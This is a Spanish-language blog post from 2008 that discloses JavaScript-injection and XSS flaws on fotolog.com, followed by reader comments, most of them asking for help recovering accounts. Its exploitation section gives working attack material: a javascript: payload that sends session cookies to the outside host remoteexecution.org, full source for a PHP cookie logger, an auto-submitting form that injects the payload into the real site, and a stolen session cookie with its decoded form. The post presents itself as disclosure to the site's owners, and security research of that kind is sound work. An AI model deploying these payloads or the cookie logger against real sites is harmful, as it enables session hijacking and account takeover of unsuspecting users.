Fallos en FOTOLOG.COM
Fallos en FOTOLOG.COM
- Presentación
- Explicación de fallos
- Explotación de fallos
- Despedida
1. Presentación:Hola!
mucho gusto, mi nombre es emiliano soy más conocido en internet por el nick de ” Knet ” y soy programador web orientado a la seguridad de los sistemas informaticos, por medio de este documento les explico y a su vez hago publico varios fallos en el sitio www.fotolog.com.
Les cuento, que los motivos que me llevaron a encontrar dichas fallas fue simplemente la curiosidad y la aplicación de conocimientos sobre el sitio, Aclaro que en ningun momento pense lucrar con dichos fallos o usarlos con algún fin de beneficio personal o algo por el estilo.
Si se los reporto es para que lo reparen de lo contrario, no sere responsable si estas fallas son encontradas por personas mal intencionadas.
Desde ya les digo Gracias por su atencion, y espero no tengan ningún otro problema.
mi Mail de contacto es : Keynet.Security@Gmail.com [ Mail ] [ MSN ]
resido en : BS.AS/Argentina
Desde ya les digo Gracias por su atencion, y espero no tengan ningún otro problema.
mi Mail de contacto es : Keynet.Security@Gmail.com [ Mail ] [ MSN ]
resido en : BS.AS/Argentina
2. Explicación de fallosFallos a tratar:
- Javascript inyección
- XSS del 2do tipo ( Cross Site Scripting )
Fallo nº1 – Javascript inyección:
En concreto el fallo reside en el filtro de variables, en la seccion Mi Cuenta – Perfil
en la parte infererior.
EJ 1:
EJ 2:
Como ven en el “EJ 2″ en la seccion de la URL podemos añadir código JS, y así optener como resultado
la ejecución de un evento JS en el navegador:
EJ 3:
ALERT con el valor de las COOKIES de session:
Fallo nº2 – XSS del 2do tipo:
este segundo fallo reside en el archivo : http://photo.fotolog.com/email_to_friends y tambien es un problema de filtrado de variables.
EJ 1:
y como poemos ver en este segundo ejemplo
EJ 2:
se logro ejecutar codigo html, poniendo en principio la cadena : </textarea> y al dar error cuando se submite la información, el valor del textarea pasa a ser las lineas enviadas por POST las cuales no son filtradas entonces pasa que se cierra el textarea y se ejecuta el código que la sigue . . .
3. Explotación de fallosla principal más simple y riesgosa forma de explotar este fallo es el robo de sessiones, les voy a demostrar en pasos simples como es posible.
Explotando el fallo nº1 – Javascript inyección
EJ 1:
si alcanzamos a ver en esta imagen, modificamos el código fuente ,elevando el valor del input llamado: link:72316332:url
y agregamos la inyeccion JS.
pasemos a explicar la inyeccion JS:
EJ 2:
javascript:document.location=’http://www.remoteexecution.org/style.php?c=’+document.cookie
este evento, lo que va a hacer es que el navegador se redirija a el sitio web :
http://www.remoteexecution.org/ al archivo style.php, siendo este archivo una aplicacion especialmente programada para capturar COOKIES por medio del navegador, su sódigo fuente es parecido a el siguiente :
<?php
$ip=getenv(‘REMOTE_ADDR’);
$cookie=$_GET['c'];
$cookie_file=’cookies.txt’;
if(isset($cookie) && $cookie!=”" && file_exists($cookie_file))
{
$open_file=fopen($cookie_file,’a');
fwrite($open_file,”\n”.’Cookie:’.”\n”.$cookie.”\n”.”IP:”.$ip.”\n”.’————————————–’);
fclose($open_file);
header(‘Location:http://www.fotolog.com/’);
}
?>
que lo que va a hacer es escribir la cookie en un archivo ” cookies.txt “, que luego puede ser utilizada por un usuario mal intencionado. intercambiando los valores de la misma opteniendo así un robo de session:
http://www.remoteexecution.org/ al archivo style.php, siendo este archivo una aplicacion especialmente programada para capturar COOKIES por medio del navegador, su sódigo fuente es parecido a el siguiente :
<?php
$ip=getenv(‘REMOTE_ADDR’);
$cookie=$_GET['c'];
$cookie_file=’cookies.txt’;
if(isset($cookie) && $cookie!=”" && file_exists($cookie_file))
{
$open_file=fopen($cookie_file,’a');
fwrite($open_file,”\n”.’Cookie:’.”\n”.$cookie.”\n”.”IP:”.$ip.”\n”.’————————————–’);
fclose($open_file);
header(‘Location:http://www.fotolog.com/’);
}
?>
que lo que va a hacer es escribir la cookie en un archivo ” cookies.txt “, que luego puede ser utilizada por un usuario mal intencionado. intercambiando los valores de la misma opteniendo así un robo de session:
luego de clickear un usuario el ataquente optiene : cookies.txt
la cookie de session:
cGFpbnRydWxlc3wxfDB8MXwxMjEzMzkwNjM1fDEyMTMzOTA2MzV8MjE5MDY1Mzl8MjkzNmI5ZWIxMDcyMTNiMmJkMTA0NzU4MTQxZWMwZTQ=
desencriptada:
paintrules|1|0|1|1213390635|1213390635|21906539|2936b9eb107213b2bd104758141ec0e4
como ven, se logro robar la session.
Explotando el fallo nº2 – XSS ( Cross Site Scripting )al ser indirecta, la ejecución de código HTML el atacante debe preparar un formulario especialmente modificado que al ser clickeado o incluso puede hacer que se auto envie , provoque la salida de código
de esta manera :
<script>
function enviar()
{
document.formulario.submit();
}
</script>
<body OnLoad=”enviar()”>
<form method=”post” action=”http://photo.fotolog.com/email_to_friends” name=”formulario”>
<input type=”hidden” name=”u” value=”cumbio”>
<input type=”hidden” name=”photo” value=”47041145″>
<input type=”hidden” name=”uploaded” value=”false”>
<input type=”hidden” name=”from” value=”keynet.security@gmail.com”>
<input type=”hidden” name=”to” value=”</textarea><script>document.location=’http://www.remoteexecution.org/style.php?c=’+document.cookie</script>”>
<input type=”hidden” name=”message” value=”He visto una foto en la página Fotolog”>
</form>
</body>
entonces al provocar se ejecutara el script, que anteriormente explique lo que hace.
siendo así cualquier página visitada, posible atacante , con este tipo de fallos en el sitio FOTOLOG.COM
todo es un riesgo.
sin mencionar que en ves de robar sessiones se podrian agregar 20 direcciones de mail que se autoenvien constantemente provocando problemas no solo al servicio de fotolog , sino tambien a terceros . . .
siendo así cualquier página visitada, posible atacante , con este tipo de fallos en el sitio FOTOLOG.COM
todo es un riesgo.
sin mencionar que en ves de robar sessiones se podrian agregar 20 direcciones de mail que se autoenvien constantemente provocando problemas no solo al servicio de fotolog , sino tambien a terceros . . .
Espero que les haya gustado, hayan entendido y sepan valorar mi explicación.
no me responsabilizo del mal uso, y el documento fue confeccionado con el fin de ayudar a la comunidad de FOTOLOG.COM.
reintero mi contacto por [Mail] o [MSN] : Keynet.Security@Gmail.com
Saludos Cordiales.
PD: Disculpen las faltas de ortografia 
You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
Julio 29th, 2008 at 3:17 AM
Woow, que bien, que bueno eres jeje
a mi tambien me interesa mucho la seguridad y encontrar bugs en sitios jeje
Agosto 5th, 2008 at 10:43 PM
a mi hija le hackearon el fotolog y esta muy trsite.yo no entiendo de computacion .me ayudas a devolverselo.
fotolog.com/onlytachh
gracias
Agosto 5th, 2008 at 11:01 PM
hola mi problema es que no puedo iniciar sesion queria ver si lo podrias arreglar..gracias..espero tu respuestaah!mi window es 98
Agosto 13th, 2008 at 3:37 PM
flaco te agregue al eme porq no entendi una garcha jaja
Agosto 21st, 2008 at 11:37 AM
hola mira no puedo iniciar secion con la pagina de fotolog
yo quiero entrar y me dise q la pagina no se puede mostra
por fabor me solucionan el probleme se los agradesco
Septiembre 9th, 2008 at 10:55 PM
mi problema esq el fotolog no tiene aceptar o entrar para comensar la iniciacion de seccio te pide los datos pero no tiene aceprtar
porfa ayudame
Septiembre 24th, 2008 at 3:19 PM
me ha hackeado el fotolog
necesito rekuperar la kontraseña
ayudaamee por favor
Octubre 10th, 2008 at 4:53 PM
hola yo estoy aca por q me han cerrado mi
cuenta de fotolog y yo le quiero decir si por favor
me lo pueden volver activar porfavor.
bueno les dejo muchos saludos y espero una
respuesta tuya
Noviembre 16th, 2008 at 9:39 AM
como puedo personalizar el fotolog es que no se lo cree hace poco y lo quiero personalizar gracias
Noviembre 16th, 2008 at 12:23 PM
NO RECUERDO CON QUE NOMBRE ESTOU REGISTRADA , GRACIAS
Diciembre 23rd, 2008 at 5:59 AM
ami me hackearon y me cerraron el fotolog /flasheadiitoh al cual yo pagaba membresia gold.
por favor ayudame a reabrirlo el flog era /flasheadiitoh
agregame asi charlamos por favor yo tenia 18.952 reverses :S soi.flasheadiitoh@hotmail.com
Diciembre 29th, 2008 at 8:41 PM
me podrias activar mi fotolog es
/ziiikaaa
en mi fotolog no tenia gold ni nada pero en una año se le toma cariño porfavor activamelo
Enero 21st, 2009 at 2:33 AM
me cerraron ese fotolog
los abres o los hackeas?
Febrero 28th, 2009 at 5:18 PM
puta la wua el log ke adm me pide a kada rato kodigos para postiar me demoro muxo me lo pueden arreglar
Marzo 3rd, 2009 at 12:05 AM
holiss soy mica son todos unos genios con la fotos los quiero
Abril 14th, 2009 at 9:25 PM
che te agregue al msn, xq no entendi mucho… y tengo un problema con fotolog muchas gracias, ojala me aceptes asi me pdoe shacer me unf avo..dese ya muchas gracias… muy buena carrera la tuya.
yo queir seeguir ingeniero en computacion es parecidoo???
soy fabrizio.ge…. sigue
..aceptame